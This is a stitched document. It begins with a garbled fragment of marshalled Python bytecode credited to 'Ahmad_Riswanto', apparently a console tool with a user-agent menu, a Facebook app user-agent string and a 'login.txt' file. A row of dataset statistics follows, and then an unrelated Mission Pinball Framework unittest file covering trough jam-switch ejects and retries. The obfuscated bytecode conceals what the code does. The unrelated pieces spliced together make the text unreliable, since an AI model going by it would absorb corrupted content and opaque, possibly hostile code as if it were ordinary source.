Close<](\n\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R:\x00\x00\x00R5\x00\x00\x00Rn\x00\x00\x00RM\x00\x00\x00R1\x00\x00\x00R\x00\x00\x00\x00Re\x00\x00\x00RW\x00\x00\x00(\x02\x00\x00\x00R\xba\x00\x00\x00R\xb2\x00\x00\x00(\x00\x00\x00\x00(\x02\x00\x00\x00R\xb9\x00\x00\x00R\x8b\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rd\x00\x00\x00\xc6\x01\x00\x00s\x1e\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x06\x01\x06\x01\n\x02\x05\x01\x15\x01\x12\x01\r\x01\x05\x02\x12\'\x0c\x01\x10\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\xbe\x00\x00\x00d\x01\x00GHd\x02\x00GHt\x00\x00d\x03\x00\x83\x01\x00}\x00\x00|\x00\x00d\x04\x00k\x02\x00r,\x00t\x01\x00\x83\x00\x00\x01n\x8e\x00|\x00\x00d\x05\x00k\x02\x00r{\x00t\x00\x00d\x06\x00\x83\x01\x00}\x01\x00t\x02\x00d\x07\x00d\x08\x00\x83\x02\x00j\x03\x00|\x01\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\t\x00\x83\x01\x00\x01t\x00\x00d\n\x00\x83\x01\x00\x01t\x01\x00\x83\x00\x00\x01n?\x00|\x00\x00d\x0b\x00k\x02\x00r\xba\x00d\x0c\x00GHt\x06\x00j\x07\x00d\r\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\t\x00\x83\x01\x00\x01t\x00\x00d\x0e\x00\x83\x01\x00\x01t\x01\x00\x83\x00\x00\x01n\x00\x00d\x00\x00S(\x0f\x00\x00\x00Ns\x15\x00\x00\x00[1] Change User-Agents\x16\x00\x00\x00[2] Default User-Agents\x0f\x00\x00\x00\n [?] Choose : R*\x00\x00\x00R=\x00\x00\x00s\x18\x00\x00\x00 [+] Enter User-Agent : s\x03\x00\x00\x00.uaR,\x00\x00\x00i\x01\x00\x00\x00s$\x00\x00\x00\n [!] Press Enter To Save User-AgentR>\x00\x00\x00s\xcb\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]s\t\x00\x00\x00rm -f .uas"\x00\x00\x00\n[\xc2\xae] User-Agent Save Successfully(\x08\x00\x00\x00R5\x00\x00\x00R3\x00\x00\x00R2\x00\x00\x00R\x12\x00\x00\x00R\x14\x00\x00\x00R\x15\x00\x00\x00R&\x00\x00\x00R\'\x00\x00\x00(\x02\x00\x00\x00R\x8b\x00\x00\x00t\x04\x00\x00\x00c_ua(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\n\x00\x00\x00setting_ua\xff\x01\x00\x00s"\x00\x00\x00\x00\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\x0c\x01\x16\x01\r\x01\n\x01\n\x01\x0c\x01\x05\x01\r\x01\r\x01\n\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s:\x00\x00\x00y\x11\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01Wn\x07\x00\x01\x01\x01n\x01\x00Xy\x11\x00t\x00\x00j\x01\x00d\x02\x00\x83\x01\x00\x01Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x03\x00\x00\x00NRD\x00\x00\x00RB\x00\x00\x00(\x02\x00\x00\x00R&\x00\x00\x00t\x05\x00\x00\x00mkdir(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x0c\x00\x00\x00raka_andrian\x12\x02\x00\x00s\x10\x00\x00\x00\x00\x01\x03\x00\x11\x01\x03\x00\x04\x01\x03\x00\x11\x01\x03\x00t\x08\x00\x00\x00__main__s\x08\x00\x00\x00git pulls\x0f\x00\x00\x00touch login.txt(<\x00\x00\x00R&\x00\x00\x00R-\x00\x00\x00t\x0b\x00\x00\x00ImportErrorR\'\x00\x00\x00t\x03\x00\x00\x00bs4R\x10\x00\x00\x00t\x02\x00\x00\x00reR\x14\x00\x00\x00R6\x00\x00\x00R\x86\x00\x00\x00t\x08\x00\x00\x00calendart\x14\x00\x00\x00multiprocessing.poolR\x00\x00\x00\x00R\x01\x00\x00\x00R\xab\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00R\x83\x00\x00\x00RW\x00\x00\x00R\x84\x00\x00\x00Rp\x00\x00\x00t\x03\x00\x00\x00nowt\x02\x00\x00\x00ctRu\x00\x00\x00R`\x00\x00\x00t\x05\x00\x00\x00bulanR1\x00\x00\x00t\x05\x00\x00\x00nTempt\n\x00\x00\x00ValueErrort\x07\x00\x00\x00currentRw\x00\x00\x00t\x02\x00\x00\x00tat\x02\x00\x00\x00buRv\x00\x00\x00t\x02\x00\x00\x00hat\x02\x00\x00\x00opR\x18\x00\x00\x00t\x05\x00\x00\x00todayt\x07\x00\x00\x00my_datet\x08\x00\x00\x00day_namet\x07\x00\x00\x00weekdayt\x02\x00\x00\x00hrR\x89\x00\x00\x00t\x03\x00\x00\x00tglRo\x00\x00\x00R(\x00\x00\x00R<\x00\x00\x00R3\x00\x00\x00RF\x00\x00\x00RH\x00\x00\x00RI\x00\x00\x00RG\x00\x00\x00Rx\x00\x00\x00Rf\x00\x00\x00Rg\x00\x00\x00Rh\x00\x00\x00Rd\x00\x00\x00R\xbc\x00\x00\x00R\xbe\x00\x00\x00t\x08\x00\x00\x00__name__(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\x08\x00\x00\x00<module>\n\x00\x00\x00sp\x00\x00\x00\x0c\x01\x03\x01\x10\x01\r\x01\x11\x02\x03\x01\x10\x01\r\x01\x11\x02`\x01\x10\x01\x10\x01\x10\x01\x10\x02\x06\x01\x06\x01\x06\x01\x06\x02\x0c\x01\t\x01*\x01\x03\x01\x18\x01\n\x01\x0e\x01\r\x01\x0b\x02\x0c\x01\t\x01\t\x01\t\x01\n\x03\t\x07\x0c\x01\x13\x01\x16\x01\x13\x01Z\x03\t\x1b\t\x19\tX\t\x10\t\x10\t\x15\t \t\x10\t+\t5\t6\t9\t\x13\t\x06\x0c\x01\r\x01\r\x01\x07\x01'))
| 12,774.4
| 63,793
| 0.744348
| 14,234
| 63,872
| 3.332373
| 0.067866
| 0.19303
| 0.07343
| 0.035418
| 0.770034
| 0.732359
| 0.679443
| 0.651066
| 0.625577
| 0.599119
| 0
| 0.374182
| 0.014466
| 63,872
| 4
| 63,794
| 15,968
| 0.379075
| 0.000924
| 0
| 0
| 0
| 4.5
| 0.713529
| 0.554936
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 13
|
dc3590b3b750baf7cca2f1f681fd36dd0d67e88d
| 32,466
|
py
|
Python
|
mpf/tests/test_BallDeviceJamSwitch.py
|
cloudjor/mpf
|
1cf6bf18b0d81120383b0b128b0ebbfa1c62717c
|
[
"MIT"
] | null | null | null |
mpf/tests/test_BallDeviceJamSwitch.py
|
cloudjor/mpf
|
1cf6bf18b0d81120383b0b128b0ebbfa1c62717c
|
[
"MIT"
] | null | null | null |
mpf/tests/test_BallDeviceJamSwitch.py
|
cloudjor/mpf
|
1cf6bf18b0d81120383b0b128b0ebbfa1c62717c
|
[
"MIT"
] | null | null | null |
from mpf.tests.MpfTestCase import MpfTestCase
from unittest.mock import MagicMock
class TestBallDeviceJamSwitch(MpfTestCase):
max_wait_ms = 200
def getConfigFile(self):
if self._testMethodName == "test_reorder_on_startup":
return 'test_ball_device_jam_switch_initial.yaml'
else:
return 'test_ball_device_jam_switch.yaml'
def getMachinePath(self):
return 'tests/machine_files/ball_device/'
def _captured_from_pf(self, balls, **kwargs):
del kwargs
self._captured += balls
def put_four_balls_in_trough(self):
self._captured = 0
self.machine.events.add_handler('balldevice_captured_from_playfield', self._captured_from_pf)
self.machine.switch_controller.process_switch('s_trough_1', 1)
self.machine.switch_controller.process_switch('s_trough_2', 1)
self.machine.switch_controller.process_switch('s_trough_3', 1)
self.machine.switch_controller.process_switch('s_trough_4', 1)
self.advance_time_and_run(1)
self.assertEqual(4, self.machine.ball_devices.trough.balls)
self.assertEqual(4, self._captured)
self._captured = 0
self.trough_coil = self.machine.coils.trough_eject
self.plunger_coil = self.machine.coils.plunger_eject
self.trough_coil.pulse = MagicMock()
self.plunger_coil.pulse = MagicMock()
def test_reorder_on_startup(self):
# test reorder on startup with a jammed trough with no ball switches active
self.assertEqual("pulsed_2", self.machine.coils.trough_eject.hw_driver.state)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_trough_2', 1)
self.machine.switch_controller.process_switch('s_trough_3', 1)
self.machine.switch_controller.process_switch('s_trough_4', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 1)
self.advance_time_and_run(1)
self.assertEqual(4, self.machine.ball_devices.trough.balls)
def test_eject_with_jam_switch(self):
# Tests the proper operation of a trough eject with a jam switch
self.put_four_balls_in_trough()
self.machine.playfield.add_ball(player_controlled=True)
self.advance_time_and_run(1)
# default pulse
self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
self.trough_coil.pulse = MagicMock()
self.machine.switch_controller.process_switch('s_trough_1', 0)
self.machine.switch_controller.process_switch('s_trough_2', 0)
self.machine.switch_controller.process_switch('s_trough_3', 0)
self.machine.switch_controller.process_switch('s_trough_4', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_trough_2', 1)
self.machine.switch_controller.process_switch('s_trough_3', 1)
self.machine.switch_controller.process_switch('s_trough_4', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 0)
self.advance_time_and_run(.1)
# ball goes into plunger
self.machine.switch_controller.process_switch('s_plunger', 1)
self.advance_time_and_run(1)
self.assertEqual(self.machine.ball_devices.trough.balls, 3)
self.assertEqual(self.machine.ball_devices.plunger.balls, 1)
assert not self.plunger_coil.pulse.called
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
# player hits the launch button
self.machine.switch_controller.process_switch('s_launch', 1)
self.machine.switch_controller.process_switch('s_launch', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_plunger', 0)
self.advance_time_and_run(1)
# ball moves from plunger lane to playfield
self.machine.switch_controller.process_switch('s_playfield', 1)
self.machine.switch_controller.process_switch('s_playfield', 0)
self.advance_time_and_run(.1)
self.plunger_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
self.assertEqual(self.machine.ball_devices.trough.balls, 3)
self.assertEqual(self.machine.ball_devices.plunger.balls, 0)
self.assertEqual(self.machine.ball_devices.playfield.balls, 1)
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("idle", self.machine.ball_devices.plunger._state)
self.assertEqual(4, self.machine.ball_controller.num_balls_known)
self.assertEqual(0, self._captured)
def test_eject_no_jam_switch_activity(self):
# Jam switch is configured, but it is not activated when the ball
# ejects
self.put_four_balls_in_trough()
self.machine.playfield.add_ball(player_controlled=True)
self.advance_time_and_run(1)
# default pulse
self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
self.machine.switch_controller.process_switch('s_trough_1', 0)
self.machine.switch_controller.process_switch('s_trough_2', 0)
self.machine.switch_controller.process_switch('s_trough_3', 0)
self.machine.switch_controller.process_switch('s_trough_4', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_trough_2', 1)
self.machine.switch_controller.process_switch('s_trough_3', 1)
self.machine.switch_controller.process_switch('s_trough_4', 1)
# self.machine.switch_controller.process_switch('s_trough_jam', 1)
# self.machine.switch_controller.process_switch('s_trough_jam', 0)
self.advance_time_and_run(.1)
# ball goes into plunger
self.machine.switch_controller.process_switch('s_plunger', 1)
self.advance_time_and_run(1)
self.assertEqual(self.machine.ball_devices.trough.balls, 3)
self.assertEqual(self.machine.ball_devices.plunger.balls, 1)
assert not self.plunger_coil.pulse.called
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
# player hits the launch button
self.machine.switch_controller.process_switch('s_launch', 1)
self.machine.switch_controller.process_switch('s_launch', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_plunger', 0)
self.advance_time_and_run(1)
# ball moves from plunger lane to playfield
self.machine.switch_controller.process_switch('s_playfield', 1)
self.machine.switch_controller.process_switch('s_playfield', 0)
self.advance_time_and_run(.1)
self.assertEqual(1, self.plunger_coil.pulse.called)
self.assertEqual(self.machine.ball_devices.trough.balls, 3)
self.assertEqual(self.machine.ball_devices.plunger.balls, 0)
self.assertEqual(self.machine.ball_devices.playfield.balls, 1)
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("idle", self.machine.ball_devices.plunger._state)
self.assertEqual(4, self.machine.ball_controller.num_balls_known)
self.assertEqual(0, self._captured)
def test_eject_with_jam_all_balls_disappear(self):
# Ball ejects and gets stuck on jam switch. All other balls shift a
# half position and get stuck between switches, so it's like all the
# balls just disappeared.
self.put_four_balls_in_trough()
self.machine.playfield.add_ball(player_controlled=True)
self.advance_time_and_run(1)
# default pulse
self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
self.trough_coil.pulse = MagicMock(return_value=100)
self.machine.switch_controller.process_switch('s_trough_1', 0)
self.machine.switch_controller.process_switch('s_trough_2', 0)
self.machine.switch_controller.process_switch('s_trough_3', 0)
self.machine.switch_controller.process_switch('s_trough_4', 0)
self.machine.switch_controller.process_switch('s_trough_jam', 1)
self.advance_time_and_run(11)
# reorder balls
self.trough_coil.pulse.assert_called_once_with(2, max_wait_ms=self.max_wait_ms)
self.trough_coil.pulse = MagicMock(return_value=100)
self.advance_time_and_run(.5)
self.machine.switch_controller.process_switch('s_trough_1', 0)
self.machine.switch_controller.process_switch('s_trough_2', 1)
self.machine.switch_controller.process_switch('s_trough_3', 1)
self.machine.switch_controller.process_switch('s_trough_4', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 1)
self.advance_time_and_run(2)
# soft pulse to eject only the jammed ball
self.trough_coil.pulse.assert_called_once_with(5, max_wait_ms=self.max_wait_ms)
self.machine.switch_controller.process_switch('s_trough_1', 0)
self.machine.switch_controller.process_switch('s_trough_2', 1)
self.machine.switch_controller.process_switch('s_trough_3', 1)
self.machine.switch_controller.process_switch('s_trough_4', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 0)
# ball goes into plunger
self.machine.switch_controller.process_switch('s_plunger', 1)
self.advance_time_and_run(1)
self.advance_time_and_run(100)
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
self.assertEqual(4, self.machine.ball_controller.num_balls_known)
self.assertEqual(0, self._captured)
def test_eject_ball_stuck_in_jam_switch(self):
# Ball ejects, gets stuck in jam switch
self.put_four_balls_in_trough()
self.machine.playfield.add_ball(player_controlled=True)
self.advance_time_and_run(1)
# default pulse
self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
self.trough_coil.pulse = MagicMock()
self.machine.switch_controller.process_switch('s_trough_1', 0)
self.machine.switch_controller.process_switch('s_trough_2', 0)
self.machine.switch_controller.process_switch('s_trough_3', 0)
self.machine.switch_controller.process_switch('s_trough_4', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_trough_2', 1)
self.machine.switch_controller.process_switch('s_trough_3', 1)
self.machine.switch_controller.process_switch('s_trough_4', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 1)
self.advance_time_and_run(.1)
# wait for timeout
self.advance_time_and_run(10)
self.assertEqual(self.machine.ball_devices.trough.balls, 4)
self.assertEqual(self.machine.ball_devices.plunger.balls, 0)
# trough should retry softly
self.trough_coil.pulse.assert_called_once_with(5, max_wait_ms=self.max_wait_ms)
assert not self.plunger_coil.pulse.called
self.machine.switch_controller.process_switch('s_trough_jam', 0)
self.advance_time_and_run(1)
# ball goes into plunger
self.machine.switch_controller.process_switch('s_plunger', 1)
self.advance_time_and_run(1)
self.advance_time_and_run(100)
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
self.assertEqual(4, self.machine.ball_controller.num_balls_known)
self.assertEqual(0, self._captured)
def test_eject_ball_falls_back_in(self):
# Ball ejects, ball leaves with proper timeout, but ball falls back in
self.put_four_balls_in_trough()
self.machine.playfield.add_ball(player_controlled=True)
self.advance_time_and_run(1)
self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
self.trough_coil.pulse = MagicMock()
self.machine.switch_controller.process_switch('s_trough_1', 0)
self.machine.switch_controller.process_switch('s_trough_2', 0)
self.machine.switch_controller.process_switch('s_trough_3', 0)
self.machine.switch_controller.process_switch('s_trough_4', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_trough_2', 1)
self.machine.switch_controller.process_switch('s_trough_3', 1)
self.machine.switch_controller.process_switch('s_trough_4', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 0)
self.advance_time_and_run(1)
# ball goes into plunger and comes back
self.machine.switch_controller.process_switch('s_trough_jam', 1)
# wait for timeout
self.advance_time_and_run(10)
self.assertEqual(self.machine.ball_devices.trough.balls, 4)
self.assertEqual(self.machine.ball_devices.plunger.balls, 0)
assert not self.plunger_coil.pulse.called
# trough should pulse softly
self.trough_coil.pulse.assert_called_once_with(5, max_wait_ms=self.max_wait_ms)
self.trough_coil.pulse = MagicMock()
# ball leaves and comes back again
self.machine.switch_controller.process_switch('s_trough_jam', 0)
self.advance_time_and_run(1)
self.machine.switch_controller.process_switch('s_trough_jam', 1)
# wait for timeout
self.advance_time_and_run(10)
self.assertEqual(self.machine.ball_devices.trough.balls, 4)
assert not self.plunger_coil.pulse.called
self.assertEqual(self.machine.ball_devices.plunger.balls, 0)
# trough should pulse softly again
self.trough_coil.pulse.assert_called_once_with(5, max_wait_ms=self.max_wait_ms)
self.trough_coil.pulse = MagicMock()
# ball leaves and comes back again
self.machine.switch_controller.process_switch('s_trough_jam', 0)
self.advance_time_and_run(1)
self.machine.switch_controller.process_switch('s_trough_jam', 1)
# wait for timeout
self.advance_time_and_run(10)
self.assertEqual(self.machine.ball_devices.trough.balls, 4)
assert not self.plunger_coil.pulse.called
self.assertEqual(self.machine.ball_devices.plunger.balls, 0)
# trough should pulse normally
self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
self.trough_coil.pulse = MagicMock()
# ball leaves and comes back again
self.machine.switch_controller.process_switch('s_trough_jam', 0)
self.advance_time_and_run(1)
self.machine.switch_controller.process_switch('s_trough_jam', 1)
# wait for timeout
self.advance_time_and_run(10)
self.assertEqual(self.machine.ball_devices.trough.balls, 4)
assert not self.plunger_coil.pulse.called
self.assertEqual(self.machine.ball_devices.plunger.balls, 0)
# trough should pulse hard
self.trough_coil.pulse.assert_called_once_with(15, max_wait_ms=self.max_wait_ms)
self.trough_coil.pulse = MagicMock()
# ball leaves
self.machine.switch_controller.process_switch('s_trough_jam', 0)
self.advance_time_and_run(1)
# ball goes into plunger
self.machine.switch_controller.process_switch('s_plunger', 1)
self.advance_time_and_run(1)
self.advance_time_and_run(100)
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
self.assertEqual(4, self.machine.ball_controller.num_balls_known)
self.assertEqual(0, self._captured)
def test_eject_ball_stuck_with_second_ball_enter(self):
# one ball on playfield, second ball ejects but gets stuck at jam
# switch right as playfield ball drains
# launch a ball into the playfield
self.put_four_balls_in_trough()
self.machine.playfield.add_ball(player_controlled=True)
self.advance_time_and_run(1)
self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
self.trough_coil.pulse = MagicMock()
self.machine.switch_controller.process_switch('s_trough_1', 0)
self.machine.switch_controller.process_switch('s_trough_2', 0)
self.machine.switch_controller.process_switch('s_trough_3', 0)
self.machine.switch_controller.process_switch('s_trough_4', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_trough_2', 1)
self.machine.switch_controller.process_switch('s_trough_3', 1)
self.machine.switch_controller.process_switch('s_trough_4', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 0)
self.advance_time_and_run(.1)
# ball goes into plunger
self.machine.switch_controller.process_switch('s_plunger', 1)
self.advance_time_and_run(1)
self.assertEqual(self.machine.ball_devices.trough.balls, 3)
self.assertEqual(self.machine.ball_devices.plunger.balls, 1)
assert not self.plunger_coil.pulse.called
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
# player hits the launch button
self.machine.switch_controller.process_switch('s_launch', 1)
self.machine.switch_controller.process_switch('s_launch', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_plunger', 0)
self.advance_time_and_run(1)
# ball moves from plunger lane to playfield
self.machine.switch_controller.process_switch('s_playfield', 1)
self.machine.switch_controller.process_switch('s_playfield', 0)
self.advance_time_and_run(.1)
self.assertEqual(1, self.plunger_coil.pulse.called)
self.assertEqual(3, self.machine.ball_devices.trough.balls)
self.assertEqual(0, self.machine.ball_devices.plunger.balls)
self.assertEqual(1, self.machine.ball_devices.playfield.balls)
self.assertEqual(1, self.machine.playfield.balls)
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("idle", self.machine.ball_devices.plunger._state)
# Playfield requests a second ball
self.machine.playfield.add_ball()
self.advance_time_and_run(1)
self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
self.trough_coil.pulse = MagicMock()
# ball gets stuck in jam switch while ball drains from pf
self.machine.switch_controller.process_switch('s_trough_2', 0)
self.machine.switch_controller.process_switch('s_trough_3', 0)
self.machine.switch_controller.process_switch('s_trough_4', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_trough_1', 1)
self.machine.switch_controller.process_switch('s_trough_1', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_trough_2', 1)
self.machine.switch_controller.process_switch('s_trough_3', 1)
self.machine.switch_controller.process_switch('s_trough_4', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 1)
self.advance_time_and_run(10)
# trough retries softly
self.trough_coil.pulse.assert_called_once_with(5, max_wait_ms=self.max_wait_ms)
self.machine.switch_controller.process_switch('s_trough_jam', 0)
self.advance_time_and_run(1)
self.machine.switch_controller.process_switch('s_plunger', 1)
self.advance_time_and_run(1)
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
self.assertEqual(4, self.machine.ball_controller.num_balls_known)
self.assertEqual(1, self.machine.ball_devices.plunger.balls)
self.assertEqual(3, self.machine.ball_devices.trough.balls)
self.assertEqual(0, self.machine.playfield.balls)
self.assertEqual(1, self._captured)
def test_eject_while_second_ball_enter(self):
# one ball on playfield, second ball ejects and the other drains at the
# same time. jam switch stays open
# launch a ball into the playfield
self.put_four_balls_in_trough()
self.machine.playfield.add_ball(player_controlled=True)
self.advance_time_and_run(1)
self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
self.trough_coil.pulse = MagicMock()
self.machine.switch_controller.process_switch('s_trough_1', 0)
self.machine.switch_controller.process_switch('s_trough_2', 0)
self.machine.switch_controller.process_switch('s_trough_3', 0)
self.machine.switch_controller.process_switch('s_trough_4', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_trough_2', 1)
self.machine.switch_controller.process_switch('s_trough_3', 1)
self.machine.switch_controller.process_switch('s_trough_4', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 0)
self.advance_time_and_run(.1)
# ball goes into plunger
self.machine.switch_controller.process_switch('s_plunger', 1)
self.advance_time_and_run(1)
self.assertEqual(self.machine.ball_devices.trough.balls, 3)
self.assertEqual(self.machine.ball_devices.plunger.balls, 1)
assert not self.plunger_coil.pulse.called
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
# player hits the launch button
self.machine.switch_controller.process_switch('s_launch', 1)
self.machine.switch_controller.process_switch('s_launch', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_plunger', 0)
self.advance_time_and_run(1)
# ball moves from plunger lane to playfield
self.machine.switch_controller.process_switch('s_playfield', 1)
self.machine.switch_controller.process_switch('s_playfield', 0)
self.advance_time_and_run(.1)
self.assertEqual(1, self.plunger_coil.pulse.called)
self.assertEqual(3, self.machine.ball_devices.trough.balls)
self.assertEqual(0, self.machine.ball_devices.plunger.balls)
self.assertEqual(1, self.machine.ball_devices.playfield.balls)
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("idle", self.machine.ball_devices.plunger._state)
# Playfield requests a second ball
self.machine.playfield.add_ball()
self.advance_time_and_run(1)
self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
self.trough_coil.pulse = MagicMock()
# ball gets stuck in jam switch while ball drains from pf
self.machine.switch_controller.process_switch('s_trough_2', 0)
self.machine.switch_controller.process_switch('s_trough_3', 0)
self.machine.switch_controller.process_switch('s_trough_4', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_trough_1', 1)
self.machine.switch_controller.process_switch('s_trough_1', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_trough_2', 1)
self.machine.switch_controller.process_switch('s_trough_3', 1)
self.machine.switch_controller.process_switch('s_trough_4', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 0)
self.advance_time_and_run(6)
# ball goes into plunger
self.machine.switch_controller.process_switch('s_plunger', 1)
self.advance_time_and_run(1)
self.assertEqual(self.machine.ball_devices.trough.balls, 3)
self.assertEqual(self.machine.ball_devices.plunger.balls, 1)
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
self.assertEqual(4, self.machine.ball_controller.num_balls_known)
self.assertEqual(1, self.machine.ball_devices.plunger.balls)
self.assertEqual(3, self.machine.ball_devices.trough.balls)
self.assertEqual(1, self._captured)
def test_random_jam_switch_enable(self):
return
# Jam switch just enables randomly
self.put_four_balls_in_trough()
self.machine.playfield.add_ball(player_controlled=True)
self.advance_time_and_run(1)
# default pulse
self.trough_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
self.trough_coil.pulse = MagicMock()
self.machine.switch_controller.process_switch('s_trough_1', 0)
self.machine.switch_controller.process_switch('s_trough_2', 0)
self.machine.switch_controller.process_switch('s_trough_3', 0)
self.machine.switch_controller.process_switch('s_trough_4', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_trough_2', 1)
self.machine.switch_controller.process_switch('s_trough_3', 1)
self.machine.switch_controller.process_switch('s_trough_4', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 1)
self.machine.switch_controller.process_switch('s_trough_jam', 0)
self.advance_time_and_run(.1)
# ball goes into plunger
self.machine.switch_controller.process_switch('s_plunger', 1)
self.advance_time_and_run(1)
self.assertEqual(self.machine.ball_devices.trough.balls, 3)
self.assertEqual(self.machine.ball_devices.plunger.balls, 1)
assert not self.plunger_coil.pulse.called
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("ejecting", self.machine.ball_devices.plunger._state)
# player hits the launch button
self.machine.switch_controller.process_switch('s_launch', 1)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_launch', 0)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_plunger', 0)
self.advance_time_and_run(1)
# ball moves from plunger lane to playfield
self.machine.switch_controller.process_switch('s_playfield', 1)
self.advance_time_and_run(.1)
self.machine.switch_controller.process_switch('s_playfield', 0)
self.advance_time_and_run(1)
self.plunger_coil.pulse.assert_called_once_with(max_wait_ms=self.max_wait_ms)
self.assertEqual(3, self.machine.ball_devices.trough.balls)
self.assertEqual(0, self.machine.ball_devices.plunger.balls)
self.assertEqual(1, self.machine.ball_devices.playfield.balls)
self.assertEqual("idle", self.machine.ball_devices.trough._state)
self.assertEqual("idle", self.machine.ball_devices.plunger._state)
# Now the jam switch enables. This should never happen in a game, but
# we should start to think about dealing with bad switches
self.machine.switch_controller.process_switch('s_trough_jam', 1)
# currently this will trigger a ball drain
raise NotImplementedError
def test_device_starts_with_active_jam_switch(self):
# MPF boots with jam switch active. During eject a ball always stays
# on the jam switch
self.put_four_balls_in_trough()
self.machine.switch_controller.process_switch('s_trough_1', 0)
self.machine.switch_controller.process_switch('s_trough_jam', 1)
self.advance_time_and_run(1)
self.machine.playfield.add_ball(player_controlled=True)
self.advance_time_and_run(1)
